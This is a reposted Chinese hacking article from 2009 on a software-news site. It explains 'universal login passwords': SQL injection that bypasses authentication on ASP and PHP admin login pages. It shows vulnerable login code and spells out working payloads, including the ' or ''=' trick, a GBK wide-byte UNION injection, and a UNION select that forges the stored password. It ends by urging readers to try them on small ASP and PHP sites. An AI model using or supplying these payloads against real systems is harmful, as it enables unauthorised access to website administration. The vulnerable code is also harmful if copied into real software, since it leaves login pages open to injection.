pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范新型万能登陆密码
阅读排行

新型万能登陆密码


2009/8/18  编辑:佚名 来源:本站整理

原创作者:oldjun

文章来源:http://www.oldjun.com/

注:本文已经发表在《黑客手册》2009年05期

本文章无技术含量, 只是提供一个思路, 思路来源于前不久暴出的那个ewebeditor2.16版本的上传漏洞。 对于过滤了单引号或者做了post防注入的站点, 此方法也无能为力了;但对于很多对登陆端没做处理的网站, 此方法值得一试, 尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能报错( MYSQL数据库)。

首先我们回顾下老的万能密码or漏洞的实现机制, 先帖一段asp源码:

---------------------------老的存在or漏洞的asp代码----------------------------------------

username = request.form("username")

password = request.form("password ")

set rs=server.createobject("adodb.recordset")

sql = "select * from admin where UserName='"&username&"' And PassWord='"& password &"'"

rs.open sql,conn,1,3

--------------------------------------------------------------------------------------------------------

将表单中的username和password数据分别赋值给username和password, 执行

select * from admin where UserName='"&username&"' And PassWord='"&password&"' 语句

但如果被赋值的username是 ' or ''=' (password任意填写)则SQL语句变成了

select * from admin where UserName='' or ''='' And PassWord='123'

''=''条件成立, 则语句成功找到管理表里首位的帐号身份验证登陆, 因而成了or漏洞, 除' or ''='以外, 'or'='or' 啊什么的都可以, 于是早年or漏洞形成了万能登陆密码。

针对这种or漏洞, 很多asp站点进行了改进, 改进后的源码大致如下:

---------------------------后来经过改进后的asp代码-----------------------------------------

username = request.form("username")

password = request.form("password ")

set rs=server.createobject("adodb.recordset")

sql = "select [password] from admin where UserName='"&username&"'"

rs.open sql,conn,1,3

If password = rs("password") then

…’登陆成功, 文章来源:http://www.oldjun.com/

End if

--------------------------------------------------------------------------------------------------------

现在很多asp站点的登陆页面都是这么写的, 如果是mssql, 还可以执行SQL语句;但如果是ACCESS, 很多人应该都会望而却步了吧?其实在没有过滤单引号的情况下, 我们还是可以用“万能密码”登陆进后台的。

下面我们进入主题, 讨论新型万能登陆密码, 以php代码为例, 由于字符集编码的问题, 管理登陆端可以注入, 先看源码:

-----------存在字符集漏洞或者magic_quotes_gpc为off的php代码-------------------

$row=$DB->query_first("SELECT * FROM admin WHERE username='$username'");

If($row){

if($password!=$row[password]) {

…..//成功, 文章来源:http://www.oldjun.com/

}else{

echo "用户名或密码错误!";

}

}else{

echo "用户名或密码错误!";

}

--------------------------------------------------------------------------------------------------------

由于字符集问题, 我们可以注入, 但由于回显都一样, 所以猜不到数据。 根据错误提示, 我们发现管理表一共6列, password在第三列, 于是我们构造如下用户名与密码:

Username=-1%cf' union select 1,1,1 as password,1,1,1 %23

Password=1

带入登陆框, sql语句为:

SELECT * FROM admin WHERE username='-1蟎' union select 1,1 as password,1,1,1,1

前面的用户名肯定不存在, 于是select出来的password就是1了, 就等于提交的password了, 经测试, 成功绕过验证。

现在我们再回头看看之前改进过的asp登陆代码, 我们该如何绕过呢, 原理同上:

Username=-1' union select 1 as [password] from admin where '1'='1

Password=1

呵呵, 轻松绕过认证, 到此为止大家知道该如何利用了吧, 对于现在绝大多数的小asp站以及一定规模的php站点, 大家不防试试这个万能密码~

相关文章

新型病毒“恶魔的声音”曝光:能完全接管手机:据国外媒体报道,一种新型病毒将会隐藏在YouTube应用程序里的音频或者视频文件中,黑客将会通过这个文件里的语音指令来诱导用户做出相应的操作,进而接管用户的手机,而到目前为止这个病毒并未为人们所熟识。

【手机不再摔碎】新型玻璃比不锈钢硬588倍:据外媒报道,一种新式金属玻璃已经出现,这种金属玻璃比不锈钢硬度高588倍,落在地面上可以反弹,利用其制造手机再也不会摔碎。

这新型藻类电池比锂电池要再多200倍的电荷!:AdamFreeman可能已经找到方法,以藻类为生质燃料来源,制造蓄电池,此发现将影响深远,而众多钟爱海藻的人们,似乎又多了一个喜欢绿藻的理由。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图